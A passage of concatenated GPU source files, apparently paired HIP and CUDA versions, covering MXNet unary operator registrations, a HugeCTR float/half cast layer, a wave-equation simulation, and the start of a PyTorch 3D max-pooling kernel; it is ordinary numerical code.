unary_bwd<mshadow_op::sigmoid_grad>>); NNVM_REGISTER_OP(hard_sigmoid) .set_attr<FCompute>("FCompute<gpu>", HardSigmoidForward<gpu>); NNVM_REGISTER_OP(_backward_hard_sigmoid) .set_attr<FCompute>("FCompute<gpu>", HardSigmoidBackward<gpu>); // softsign NNVM_REGISTER_OP(softsign) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::Compute<gpu, mshadow_op::softsign>); NNVM_REGISTER_OP(_backward_softsign) .set_attr<FCompute>("FCompute<gpu>", ElemwiseBinaryOp::Compute< gpu, unary_bwd<mshadow_op::softsign_grad>>); // erf NNVM_REGISTER_OP(erf) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::Compute<gpu, mshadow_op::erf>); NNVM_REGISTER_OP(_backward_erf) .set_attr<FCompute>("FCompute<gpu>", ElemwiseBinaryOp::Compute<gpu, unary_bwd<mshadow_op::erf_grad>>); // erfinv NNVM_REGISTER_OP(erfinv) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::Compute<gpu, mshadow_op::erfinv>); NNVM_REGISTER_OP(_backward_erfinv) .set_attr<FCompute>("FCompute<gpu>", ElemwiseBinaryOp::Compute<gpu, unary_bwd<mshadow_op::erfinv_grad>>); // copy NNVM_REGISTER_OP(_copy) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::IdentityCompute<gpu>) .set_attr<FComputeEx>("FComputeEx<gpu>", UnaryOp::IdentityComputeEx<gpu>); NNVM_REGISTER_OP(_backward_copy) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::IdentityCompute<gpu>) .set_attr<FComputeEx>("FComputeEx<gpu>", UnaryOp::IdentityComputeEx<gpu>); NNVM_REGISTER_OP(_backward_reshape) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::IdentityCompute<gpu>); NNVM_REGISTER_OP(BlockGrad) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::IdentityCompute<gpu>); NNVM_REGISTER_OP(make_loss) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::IdentityCompute<gpu>) .set_attr<FComputeEx>("FComputeEx<gpu>", UnaryOp::IdentityComputeEx<gpu>); // identity output as first input, but attributes are constrainted to be like rhs NNVM_REGISTER_OP(_identity_with_attr_like_rhs) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::IdentityCompute<gpu>) .set_attr<FComputeEx>("FComputeEx<gpu>", UnaryOp::IdentityComputeFirstItemEx<gpu>); NNVM_REGISTER_OP(reshape_like) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::IdentityCompute<gpu>); void ShapeComputeGPU(const nnvm::NodeAttrs& attrs, const OpContext& ctx, const std::vector<TBlob>& inputs, const std::vector<OpReqType>& req, const std::vector<TBlob>& outputs) { using namespace mshadow; CHECK_EQ(inputs.size(), 1U); CHECK_EQ(outputs.size(), 1U); CHECK_EQ(req.size(), 1U); const TBlob& in_data = inputs[0]; const TBlob& out_data = outputs[0]; mshadow::Stream<gpu> *s = ctx.get_stream<gpu>(); cudaMemcpyAsync(out_data.dptr_, in_data.shape_.data(), in_data.ndim() * sizeof(int64_t), cudaMemcpyHostToDevice, mshadow::Stream<gpu>::GetStream(s)); } NNVM_REGISTER_OP(shape_array) .set_attr<FCompute>("FCompute<gpu>", ShapeComputeGPU); void SizeComputeGPU(const nnvm::NodeAttrs& attrs, const OpContext& ctx, const std::vector<TBlob>& inputs, const std::vector<OpReqType>& req, const std::vector<TBlob>& outputs) { using namespace mshadow; using namespace mxnet_op; CHECK_EQ(inputs.size(), 1U); CHECK_EQ(outputs.size(), 1U); CHECK_EQ(req.size(), 1U); const TBlob& in_data = inputs[0]; const TBlob& out_data = outputs[0]; mshadow::Stream<gpu> *s = ctx.get_stream<gpu>(); const index_t size_var = in_data.Size(); cudaMemcpyAsync(out_data.dptr_, &size_var, 1U * sizeof(int64_t), cudaMemcpyHostToDevice, mshadow::Stream<gpu>::GetStream(s)); } NNVM_REGISTER_OP(size_array) .set_attr<FCompute>("FCompute<gpu>", SizeComputeGPU); NNVM_REGISTER_OP(Cast) .set_attr<FCompute>("FCompute<gpu>", CastCompute<gpu>); NNVM_REGISTER_OP(_backward_cast) .set_attr<FCompute>("FCompute<gpu>", CastCompute<gpu>); // negative NNVM_REGISTER_OP(negative) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::Compute<gpu, mshadow_op::negation>) .set_attr<FComputeEx>("FComputeEx<gpu>", UnaryOp::ComputeEx<gpu, mshadow_op::negation>); // abs NNVM_REGISTER_OP(abs) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::Compute<gpu, mshadow_op::abs>) .set_attr<FComputeEx>("FComputeEx<gpu>", UnaryOp::ComputeEx<gpu, mshadow_op::abs>); NNVM_REGISTER_OP(_backward_abs) .set_attr<FCompute>("FCompute<gpu>", ElemwiseBinaryOp::Compute<gpu, unary_bwd<mshadow_op::sign> >); // sign NNVM_REGISTER_OP(sign) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::Compute<gpu, mshadow_op::sign>) .set_attr<FComputeEx>("FComputeEx<gpu>", UnaryOp::ComputeEx<gpu, mshadow_op::sign>); NNVM_REGISTER_OP(_backward_sign) .set_attr<FCompute>("FCompute<gpu>", ElemwiseBinaryOp::Compute< gpu, unary_bwd<mshadow_op::sign_grad> >); // round NNVM_REGISTER_OP(round) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::Compute<gpu, mshadow_op::round>) .set_attr<FComputeEx>("FComputeEx<gpu>", UnaryOp::ComputeEx<gpu, mshadow_op::round>); // ceil NNVM_REGISTER_OP(ceil) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::Compute<gpu, mshadow_op::ceil>) .set_attr<FComputeEx>("FComputeEx<gpu>", UnaryOp::ComputeEx<gpu, mshadow_op::ceil>); // floor NNVM_REGISTER_OP(floor) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::Compute<gpu, mshadow_op::floor>) .set_attr<FComputeEx>("FComputeEx<gpu>", UnaryOp::ComputeEx<gpu, mshadow_op::floor>); // trunc NNVM_REGISTER_OP(trunc) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::Compute<gpu, mshadow_op::trunc>) .set_attr<FComputeEx>("FComputeEx<gpu>", UnaryOp::ComputeEx<gpu, mshadow_op::trunc>); // rint NNVM_REGISTER_OP(rint) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::Compute<gpu, mshadow_op::rint>) .set_attr<FComputeEx>("FComputeEx<gpu>", UnaryOp::ComputeEx<gpu, mshadow_op::rint>); // fix NNVM_REGISTER_OP(fix) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::Compute<gpu, mshadow_op::fix>) .set_attr<FComputeEx>("FComputeEx<gpu>", UnaryOp::ComputeEx<gpu, mshadow_op::fix>); // gamma NNVM_REGISTER_OP(gamma) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::Compute<gpu, mshadow_op::gamma>); NNVM_REGISTER_OP(_backward_gamma) .set_attr<FCompute>("FCompute<gpu>", ElemwiseBinaryOp::Compute< gpu, unary_bwd<mshadow_op::gamma_grad> >); // gammaln NNVM_REGISTER_OP(gammaln) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::Compute<gpu, mshadow_op::gammaln>); NNVM_REGISTER_OP(_backward_gammaln) .set_attr<FCompute>("FCompute<gpu>", ElemwiseBinaryOp::Compute< gpu, unary_bwd<mshadow_op::gammaln_grad> >); // digamma NNVM_REGISTER_OP(digamma) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::Compute<gpu, mshadow_op::digamma>); NNVM_REGISTER_OP(_backward_digamma) .set_attr<FCompute>("FCompute<gpu>", ElemwiseBinaryOp::Compute< gpu, unary_bwd<mshadow_op::trigamma> >); // logical not NNVM_REGISTER_OP(logical_not) .set_attr<FCompute>("FCompute<gpu>", UnaryOp::Compute<gpu, mshadow_op::nt>); } // namespace op } // namespace mxnet
456e960bec327b051125ff5bd0e9feaf3d3eeaf0.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" /* * Copyright (c) 2020, NVIDIA CORPORATION. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ #include <hip/hip_fp16.h> #include <layers/cast_layer.hpp> #include "HugeCTR/include/utils.hpp" namespace HugeCTR { namespace { __global__ void cast_kernel(__half* out, const float* in, int size) { __half2* out2 = (__half2*)(out); float2* in2 = (float2*)(in); int size2 = size / 2; int start = blockIdx.x * blockDim.x + threadIdx.x; for (int i = start; i < size2; i += blockDim.x * gridDim.x) { out2[i] = __float22half2_rn(__ldg(in2 + i)); } if (start == 0 && size % 2 > 0) { out[size - 1] = __float2half(__ldg(in + size - 1)); } } __global__ void cast_kernel(float* out, const __half* in, int size) { float2* out2 = (float2*)(out); __half2* in2 = (__half2*)(in); int size2 = size / 2; int start = blockIdx.x * blockDim.x + threadIdx.x; for (int i = start; i < size2; i += blockDim.x * gridDim.x) { out2[i] = __half22float2(__ldg(in2 + i)); } if (start == 0 && size % 2 > 0) { out[size - 1] = __half2float(__ldg(in + size - 1)); } } } // namespace template <typename From, typename To> CastLayer<From, To>::CastLayer(const Tensor2<From>& bottom_tensor, const Tensor2<To>& top_tensor, const std::shared_ptr<GPUResource>& gpu_resource) : Layer(gpu_resource) { assert(bottom_tensor.get_num_elements() == top_tensor.get_num_elements()); bottom_tensor_ = bottom_tensor; top_tensor_ = top_tensor; } template <typename From, typename To> void CastLayer<From, To>::fprop(bool is_train) { CudaDeviceContext context(get_device_id()); const From* bottom = bottom_tensor_.get_ptr(); To* top = top_tensor_.get_ptr(); const size_t threads = 512; const size_t blocks = ::min((bottom_tensor_.get_num_elements() - 1) / threads + 1, 1024ul); hipLaunchKernelGGL(( cast_kernel), dim3(blocks), dim3(threads), 0, get_gpu().get_stream(), top, bottom, bottom_tensor_.get_num_elements()); #ifndef NDEBUG CK_CUDA_THROW_(hipDeviceSynchronize()); CK_CUDA_THROW_(hipGetLastError()); #endif } template <typename From, typename To> void CastLayer<From, To>::bprop() { CudaDeviceContext context(get_device_id()); #ifndef NDEBUG CK_CUDA_THROW_(hipDeviceSynchronize()); CK_CUDA_THROW_(hipGetLastError()); #endif } template class CastLayer<float, __half>; template class CastLayer<__half, float>; } // namespace HugeCTR
456e960bec327b051125ff5bd0e9feaf3d3eeaf0.cu
/* * Copyright (c) 2020, NVIDIA CORPORATION. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ #include <cuda_fp16.h> #include <layers/cast_layer.hpp> #include "HugeCTR/include/utils.hpp" namespace HugeCTR { namespace { __global__ void cast_kernel(__half* out, const float* in, int size) { __half2* out2 = (__half2*)(out); float2* in2 = (float2*)(in); int size2 = size / 2; int start = blockIdx.x * blockDim.x + threadIdx.x; for (int i = start; i < size2; i += blockDim.x * gridDim.x) { out2[i] = __float22half2_rn(__ldg(in2 + i)); } if (start == 0 && size % 2 > 0) { out[size - 1] = __float2half(__ldg(in + size - 1)); } } __global__ void cast_kernel(float* out, const __half* in, int size) { float2* out2 = (float2*)(out); __half2* in2 = (__half2*)(in); int size2 = size / 2; int start = blockIdx.x * blockDim.x + threadIdx.x; for (int i = start; i < size2; i += blockDim.x * gridDim.x) { out2[i] = __half22float2(__ldg(in2 + i)); } if (start == 0 && size % 2 > 0) { out[size - 1] = __half2float(__ldg(in + size - 1)); } } } // namespace template <typename From, typename To> CastLayer<From, To>::CastLayer(const Tensor2<From>& bottom_tensor, const Tensor2<To>& top_tensor, const std::shared_ptr<GPUResource>& gpu_resource) : Layer(gpu_resource) { assert(bottom_tensor.get_num_elements() == top_tensor.get_num_elements()); bottom_tensor_ = bottom_tensor; top_tensor_ = top_tensor; } template <typename From, typename To> void CastLayer<From, To>::fprop(bool is_train) { CudaDeviceContext context(get_device_id()); const From* bottom = bottom_tensor_.get_ptr(); To* top = top_tensor_.get_ptr(); const size_t threads = 512; const size_t blocks = std::min((bottom_tensor_.get_num_elements() - 1) / threads + 1, 1024ul); cast_kernel<<<blocks, threads, 0, get_gpu().get_stream()>>>(top, bottom, bottom_tensor_.get_num_elements()); #ifndef NDEBUG CK_CUDA_THROW_(cudaDeviceSynchronize()); CK_CUDA_THROW_(cudaGetLastError()); #endif } template <typename From, typename To> void CastLayer<From, To>::bprop() { CudaDeviceContext context(get_device_id()); #ifndef NDEBUG CK_CUDA_THROW_(cudaDeviceSynchronize()); CK_CUDA_THROW_(cudaGetLastError()); #endif } template class CastLayer<float, __half>; template class CastLayer<__half, float>; } // namespace HugeCTR
57b8f32a28778fba6aa863b0eb63b51474ae0c61.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" #include "device_launch_parameters.h" #include <stdio.h> #include <stdlib.h> #include <time.h> #define Rho 0.5 #define Eta 0.0002 #define G 0.75 #define N 512 #define DECOMPOSITION_PER_ROW 51 // row decomposition, furthermore devide a row into multiple pieces, minimum is 1 #define ELEMENT_PER_THREAD (N - 2) / DECOMPOSITION_PER_ROW // one thread handles all the elements in a single piece #define NUM_THREADS ((N - 2) * (N - 2)) / ((N - 2) / DECOMPOSITION_PER_ROW) #define NUM_THREADS_EDGE 4 * DECOMPOSITION_PER_ROW #define NUM_BLOCKS (NUM_THREADS + 1024 - NUM_THREADS % 1024) / 1024 #define NUM_BLOCKS_EDGE (NUM_THREADS_EDGE + 1024 - NUM_THREADS_EDGE % 1024) / 1024 void iteration_sequential(float u[N * N], float u1[N * N], float u2[N * N]) { clock_t start, end; for (int i = 1; i <= N - 2; i++) { for (int j = 1; j <= N - 2; j++) { u[i * N + j] = Rho * (u1[(i - 1) * N + j] + u1[(i + 1) * N + j] + u1[i * N + (j - 1)] + u1[i * N + (j + 1)] - 4 * u1[i * N + j]); u[i * N + j] += 2 * u1[i * N + j] - (1 - Eta) * u2[i * N + j]; u[i * N + j] /= (1 + Eta); } } for (int i = 1; i <= N - 2; i++) { u[0 * N + i] = G * u[1 * N + i]; u[(N - 1) * N + i] = G * u[(N - 2) * N + i]; u[i * N + 0] = G * u[i * N + 1]; u[i * N + (N - 1)] = G * u[i * N + (N - 2)]; } u[0 * N + 0] = G * u[1 * N + 0]; u[(N - 1) * N + 0] = G * u[(N - 2) * N + 0]; u[0 * N + (N - 1)] = G * u[0 * N + (N - 2)]; u[(N - 1) * N + (N - 1)] = G * u[(N - 1) * N + (N - 2)]; for (int i = 0; i < N * N; i++) { u2[i] = u1[i]; u1[i] = u[i]; } /*for (int i = 0; i < N * N; i++) { printf("(%d,%d): ", i / N, i % N); printf("%.6f ", u[i]); if ((i + 1) % N == 0) printf("\n"); }*/ } __global__ void iteration_parallel_central(float* u_dev, float* u1_dev, float* u2_dev) { int i = blockIdx.x * blockDim.x + threadIdx.x; if (i < NUM_THREADS) { for (int j = 0; j < ELEMENT_PER_THREAD; j++) { // index conversion from 2D to flat: u[i][j] = u[x * N + y] // int x = (i * (N - 2) + j) / (N - 2) + 1; // int y = (i * (N - 2) + j) % (N - 2) + 1; int x = (i / DECOMPOSITION_PER_ROW) + 1; int y = (i % DECOMPOSITION_PER_ROW) * ELEMENT_PER_THREAD + 1 + j; u_dev[x * N + y] = Rho * (u1_dev[(x - 1) * N + y] + u1_dev[(x + 1) * N + y] + u1_dev[x * N + (y - 1)] + u1_dev[x * N + (y + 1)] - 4 * u1_dev[x * N + y]); u_dev[x * N + y] += 2 * u1_dev[x * N + y] - (1 - Eta) * u2_dev[x * N + y]; u_dev[x * N + y] /= (1 + Eta); } } } __global__ void iteration_parallel_edge(float* u_dev) { int i = blockIdx.x * blockDim.x + threadIdx.x; if (i >= 0 && i < NUM_THREADS_EDGE / 4) { for (int j = 0; j < ELEMENT_PER_THREAD; j++) { // index conversion from 2D to flat: u[i][j] = u[x * N + y] int offset = (i % DECOMPOSITION_PER_ROW) * ELEMENT_PER_THREAD + 1 + j; u_dev[0 * N + offset] = G * u_dev[1 * N + offset]; } } if (i >= NUM_THREADS_EDGE / 4 && i < NUM_THREADS_EDGE / 4 * 2) { for (int j = 0; j < ELEMENT_PER_THREAD; j++) { // index conversion from 2D to flat: u[i][j] = u[x * N + y] int offset = (i % DECOMPOSITION_PER_ROW) * ELEMENT_PER_THREAD + 1 + j; u_dev[(N - 1) * N + offset] = G * u_dev[(N - 2) * N + offset]; } } if (i >= NUM_THREADS_EDGE / 4 * 2 && i < NUM_THREADS_EDGE / 4 * 3) { for (int j = 0; j < ELEMENT_PER_THREAD; j++) { // index conversion from 2D to flat: u[i][j] = u[x * N + y] int offset = (i % DECOMPOSITION_PER_ROW) * ELEMENT_PER_THREAD + 1 + j; u_dev[offset * N + 0] = G * u_dev[offset * N + 1]; } } if (i >= NUM_THREADS_EDGE / 4 * 3 && i < NUM_THREADS_EDGE) { for (int j = 0; j < ELEMENT_PER_THREAD; j++) { // index conversion from 2D to flat: u[i][j] = u[x * N + y] int offset = (i % DECOMPOSITION_PER_ROW) * ELEMENT_PER_THREAD + 1 + j; u_dev[offset * N + (N - 1)] = G * u_dev[offset * N + (N - 2)]; } } } __global__ void iteration_parallel_update(float* u_dev, float* u1_dev, float* u2_dev) { int i = blockIdx.x * blockDim.x + threadIdx.x; if (i < N * N) { u2_dev[i] = u1_dev[i]; u1_dev[i] = u_dev[i]; } } int main(int argc, char* argv[]) { printf("argc = %d, argv = %s\n", argc, argv[1]); int T = atoi(argv[1]); float* u = (float*)malloc(N * N * sizeof(float)); float* u1 = (float*)malloc(N * N * sizeof(float)); float* u2 = (float*)malloc(N * N * sizeof(float)); for (int i = 0; i < N * N; i++) { u[i] = 0.f; u1[i] = 0.f; u2[i] = 0.f; } ////////////////////////////// // sequential approach clock_t start, end; start = clock(); for (int i = 0; i < T; i++) { if (i == 0) u1[(N / 2) * N + (N / 2)] += 1; printf("Iteration: %d, ", i); iteration_sequential(u, u1, u2); printf("(%d,%d): ", N / 2, N / 2); printf("%.6f\n", u[(N / 2) * N + (N / 2)]); } end = clock(); printf("Time spent = %f\n", (double)(end - start) / (double)CLOCKS_PER_SEC); ////////////////////////////// printf("\n\n"); ////////////////////////////// // parallel approach hipSetDevice(0); float* u_dev; float* u1_dev; float* u2_dev; hipMallocManaged((void**)&u_dev, N * N * sizeof(float)); hipMallocManaged((void**)&u1_dev, N * N * sizeof(float)); hipMallocManaged((void**)&u2_dev, N * N * sizeof(float)); for (int i = 0; i < N * N; i++) { u_dev[i] = 0.f; u1_dev[i] = 0.f; u2_dev[i] = 0.f; } start = clock(); for (int i = 0; i < T; i++) { if (i == 0) u1_dev[(N / 2) * N + (N / 2)] += 1; printf("Iteration: %d, ", i); iteration_parallel_central << <NUM_BLOCKS, 1024 >> > (u_dev, u1_dev, u2_dev); hipDeviceSynchronize(); /*hipError_t error = hipGetLastError(); if (error != hipSuccess) { fprintf(stderr, "ERROR: %s \n", hipGetErrorString(error)); }*/ iteration_parallel_edge << <NUM_BLOCKS_EDGE, 1024 >> > (u_dev); hipDeviceSynchronize(); u_dev[0 * N + 0] = G * u_dev[1 * N + 0]; u_dev[(N - 1) * N + 0] = G * u_dev[(N - 2) * N + 0]; u_dev[0 * N + (N - 1)] = G * u_dev[0 * N + (N - 2)]; u_dev[(N - 1) * N + (N - 1)] = G * u_dev[(N - 1) * N + (N - 2)]; iteration_parallel_update << <((N * N) + 1024 - (N * N) % 1024) / 1024, 1024 >> > (u_dev, u1_dev, u2_dev); hipDeviceSynchronize(); printf("(%d,%d): ", N / 2, N / 2); printf("%.6f\n", u_dev[(N / 2) * N + (N / 2)]); } end = clock(); printf("Time spent = %f\n", (double)(end - start) / (double)CLOCKS_PER_SEC); hipFree(u_dev); hipFree(u1_dev); hipFree(u2_dev); ////////////////////////////// return 0; }
57b8f32a28778fba6aa863b0eb63b51474ae0c61.cu
#include "cuda_runtime.h" #include "device_launch_parameters.h" #include <stdio.h> #include <stdlib.h> #include <time.h> #define Rho 0.5 #define Eta 0.0002 #define G 0.75 #define N 512 #define DECOMPOSITION_PER_ROW 51 // row decomposition, furthermore devide a row into multiple pieces, minimum is 1 #define ELEMENT_PER_THREAD (N - 2) / DECOMPOSITION_PER_ROW // one thread handles all the elements in a single piece #define NUM_THREADS ((N - 2) * (N - 2)) / ((N - 2) / DECOMPOSITION_PER_ROW) #define NUM_THREADS_EDGE 4 * DECOMPOSITION_PER_ROW #define NUM_BLOCKS (NUM_THREADS + 1024 - NUM_THREADS % 1024) / 1024 #define NUM_BLOCKS_EDGE (NUM_THREADS_EDGE + 1024 - NUM_THREADS_EDGE % 1024) / 1024 void iteration_sequential(float u[N * N], float u1[N * N], float u2[N * N]) { clock_t start, end; for (int i = 1; i <= N - 2; i++) { for (int j = 1; j <= N - 2; j++) { u[i * N + j] = Rho * (u1[(i - 1) * N + j] + u1[(i + 1) * N + j] + u1[i * N + (j - 1)] + u1[i * N + (j + 1)] - 4 * u1[i * N + j]); u[i * N + j] += 2 * u1[i * N + j] - (1 - Eta) * u2[i * N + j]; u[i * N + j] /= (1 + Eta); } } for (int i = 1; i <= N - 2; i++) { u[0 * N + i] = G * u[1 * N + i]; u[(N - 1) * N + i] = G * u[(N - 2) * N + i]; u[i * N + 0] = G * u[i * N + 1]; u[i * N + (N - 1)] = G * u[i * N + (N - 2)]; } u[0 * N + 0] = G * u[1 * N + 0]; u[(N - 1) * N + 0] = G * u[(N - 2) * N + 0]; u[0 * N + (N - 1)] = G * u[0 * N + (N - 2)]; u[(N - 1) * N + (N - 1)] = G * u[(N - 1) * N + (N - 2)]; for (int i = 0; i < N * N; i++) { u2[i] = u1[i]; u1[i] = u[i]; } /*for (int i = 0; i < N * N; i++) { printf("(%d,%d): ", i / N, i % N); printf("%.6f ", u[i]); if ((i + 1) % N == 0) printf("\n"); }*/ } __global__ void iteration_parallel_central(float* u_dev, float* u1_dev, float* u2_dev) { int i = blockIdx.x * blockDim.x + threadIdx.x; if (i < NUM_THREADS) { for (int j = 0; j < ELEMENT_PER_THREAD; j++) { // index conversion from 2D to flat: u[i][j] = u[x * N + y] // int x = (i * (N - 2) + j) / (N - 2) + 1; // int y = (i * (N - 2) + j) % (N - 2) + 1; int x = (i / DECOMPOSITION_PER_ROW) + 1; int y = (i % DECOMPOSITION_PER_ROW) * ELEMENT_PER_THREAD + 1 + j; u_dev[x * N + y] = Rho * (u1_dev[(x - 1) * N + y] + u1_dev[(x + 1) * N + y] + u1_dev[x * N + (y - 1)] + u1_dev[x * N + (y + 1)] - 4 * u1_dev[x * N + y]); u_dev[x * N + y] += 2 * u1_dev[x * N + y] - (1 - Eta) * u2_dev[x * N + y]; u_dev[x * N + y] /= (1 + Eta); } } } __global__ void iteration_parallel_edge(float* u_dev) { int i = blockIdx.x * blockDim.x + threadIdx.x; if (i >= 0 && i < NUM_THREADS_EDGE / 4) { for (int j = 0; j < ELEMENT_PER_THREAD; j++) { // index conversion from 2D to flat: u[i][j] = u[x * N + y] int offset = (i % DECOMPOSITION_PER_ROW) * ELEMENT_PER_THREAD + 1 + j; u_dev[0 * N + offset] = G * u_dev[1 * N + offset]; } } if (i >= NUM_THREADS_EDGE / 4 && i < NUM_THREADS_EDGE / 4 * 2) { for (int j = 0; j < ELEMENT_PER_THREAD; j++) { // index conversion from 2D to flat: u[i][j] = u[x * N + y] int offset = (i % DECOMPOSITION_PER_ROW) * ELEMENT_PER_THREAD + 1 + j; u_dev[(N - 1) * N + offset] = G * u_dev[(N - 2) * N + offset]; } } if (i >= NUM_THREADS_EDGE / 4 * 2 && i < NUM_THREADS_EDGE / 4 * 3) { for (int j = 0; j < ELEMENT_PER_THREAD; j++) { // index conversion from 2D to flat: u[i][j] = u[x * N + y] int offset = (i % DECOMPOSITION_PER_ROW) * ELEMENT_PER_THREAD + 1 + j; u_dev[offset * N + 0] = G * u_dev[offset * N + 1]; } } if (i >= NUM_THREADS_EDGE / 4 * 3 && i < NUM_THREADS_EDGE) { for (int j = 0; j < ELEMENT_PER_THREAD; j++) { // index conversion from 2D to flat: u[i][j] = u[x * N + y] int offset = (i % DECOMPOSITION_PER_ROW) * ELEMENT_PER_THREAD + 1 + j; u_dev[offset * N + (N - 1)] = G * u_dev[offset * N + (N - 2)]; } } } __global__ void iteration_parallel_update(float* u_dev, float* u1_dev, float* u2_dev) { int i = blockIdx.x * blockDim.x + threadIdx.x; if (i < N * N) { u2_dev[i] = u1_dev[i]; u1_dev[i] = u_dev[i]; } } int main(int argc, char* argv[]) { printf("argc = %d, argv = %s\n", argc, argv[1]); int T = atoi(argv[1]); float* u = (float*)malloc(N * N * sizeof(float)); float* u1 = (float*)malloc(N * N * sizeof(float)); float* u2 = (float*)malloc(N * N * sizeof(float)); for (int i = 0; i < N * N; i++) { u[i] = 0.f; u1[i] = 0.f; u2[i] = 0.f; } ////////////////////////////// // sequential approach clock_t start, end; start = clock(); for (int i = 0; i < T; i++) { if (i == 0) u1[(N / 2) * N + (N / 2)] += 1; printf("Iteration: %d, ", i); iteration_sequential(u, u1, u2); printf("(%d,%d): ", N / 2, N / 2); printf("%.6f\n", u[(N / 2) * N + (N / 2)]); } end = clock(); printf("Time spent = %f\n", (double)(end - start) / (double)CLOCKS_PER_SEC); ////////////////////////////// printf("\n\n"); ////////////////////////////// // parallel approach cudaSetDevice(0); float* u_dev; float* u1_dev; float* u2_dev; cudaMallocManaged((void**)&u_dev, N * N * sizeof(float)); cudaMallocManaged((void**)&u1_dev, N * N * sizeof(float)); cudaMallocManaged((void**)&u2_dev, N * N * sizeof(float)); for (int i = 0; i < N * N; i++) { u_dev[i] = 0.f; u1_dev[i] = 0.f; u2_dev[i] = 0.f; } start = clock(); for (int i = 0; i < T; i++) { if (i == 0) u1_dev[(N / 2) * N + (N / 2)] += 1; printf("Iteration: %d, ", i); iteration_parallel_central << <NUM_BLOCKS, 1024 >> > (u_dev, u1_dev, u2_dev); cudaDeviceSynchronize(); /*cudaError_t error = cudaGetLastError(); if (error != cudaSuccess) { fprintf(stderr, "ERROR: %s \n", cudaGetErrorString(error)); }*/ iteration_parallel_edge << <NUM_BLOCKS_EDGE, 1024 >> > (u_dev); cudaDeviceSynchronize(); u_dev[0 * N + 0] = G * u_dev[1 * N + 0]; u_dev[(N - 1) * N + 0] = G * u_dev[(N - 2) * N + 0]; u_dev[0 * N + (N - 1)] = G * u_dev[0 * N + (N - 2)]; u_dev[(N - 1) * N + (N - 1)] = G * u_dev[(N - 1) * N + (N - 2)]; iteration_parallel_update << <((N * N) + 1024 - (N * N) % 1024) / 1024, 1024 >> > (u_dev, u1_dev, u2_dev); cudaDeviceSynchronize(); printf("(%d,%d): ", N / 2, N / 2); printf("%.6f\n", u_dev[(N / 2) * N + (N / 2)]); } end = clock(); printf("Time spent = %f\n", (double)(end - start) / (double)CLOCKS_PER_SEC); cudaFree(u_dev); cudaFree(u1_dev); cudaFree(u2_dev); ////////////////////////////// return 0; }
67cb304db55720a9860557b8661f98c913ccede3.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" #include <ATen/AccumulateType.h> #include <ATen/native/Pool.h> #include <ATen/hip/HIPContext.h> #include <ATen/hip/HIPApplyUtils.cuh> #include <ATen/hip/detail/TensorInfo.cuh> #include <ATen/hip/detail/IndexUtils.cuh> #include <ATen/hip/detail/KernelUtils.h> #include <THH/THHNumerics.cuh> #include <c10/macros/Macros.h> namespace at { namespace native { namespace { __device__ inline int min(int a, int b) { return a <= b ? a : b; } template <typename scalar_t> __global__ static void max_pool3d_with_indices_single_out_frame( scalar_t* inputData, PackedTensorAccessor<scalar_t, 4> output, PackedTensorAccessor<int64_t, 4> indices, int itime, int iheight, int iwidth, int kT, int kH, int kW, int dT, int dH, int dW, int pT, int pH, int pW, int dilationT, int dilationH, int dilationW, int offsetZ) { int oColumn = blockIdx.x * blockDim.x + threadIdx.x; int oRow = blockIdx.y * blockDim.y + threadIdx.y; int oFrame = (blockIdx.z + offsetZ) % output.size(1); // output frame/time int slice = (blockIdx.z + offsetZ) / output.size(1); // output slice/feature if (oRow < output.size(2) && oColumn < output.size(3)) { int tStart = oFrame * dT - pT; int hStart = oRow * dH - pH; int wStart = oColumn * dW - pW; int tEnd = min(tStart + (kT - 1) * dilationT + 1, itime); int hEnd = min(hStart + (kH - 1) * dilationH + 1, iheight); int wEnd = min(wStart + (kW - 1) * dilationW + 1, iwidth); while(tStart < 0) tStart += dilationT; while(hStart < 0) hStart += dilationH; while(wStart < 0) wStart += dilationW; int index = 0; int maxIndex = -1; inputData += slice * itime * iheight * iwidth; scalar_t max = THCNumerics<scalar_t>::min(); for (int t = tStart; t < tEnd; t += dilationT) { for (int h = hStart; h < hEnd; h += dilationH) { for (int w = wStart; w < wEnd; w += dilationW) { index = t * iheight * iwidth + h * iwidth + w; scalar_t val = inputData[index]; if ((max < val) || THCNumerics<scalar_t>::isnan(val)) { max = val; maxIndex = index; } } } } output[slice][oFrame][oRow][oColumn] = max; indices[slice][oFrame][oRow][oColumn] = maxIndex; } } template <int KERNEL_WIDTH, typename scalar_t> __global__ static void max_pool3d_with_indices_single_out_frame( scalar_t* inputData, PackedTensorAccessor<scalar_t, 4> output, PackedTensorAccessor<int64_t, 4> indices, int itime, int iheight, int iwidth, int kT, int kH, int dT, int dH, int dW, int pT, 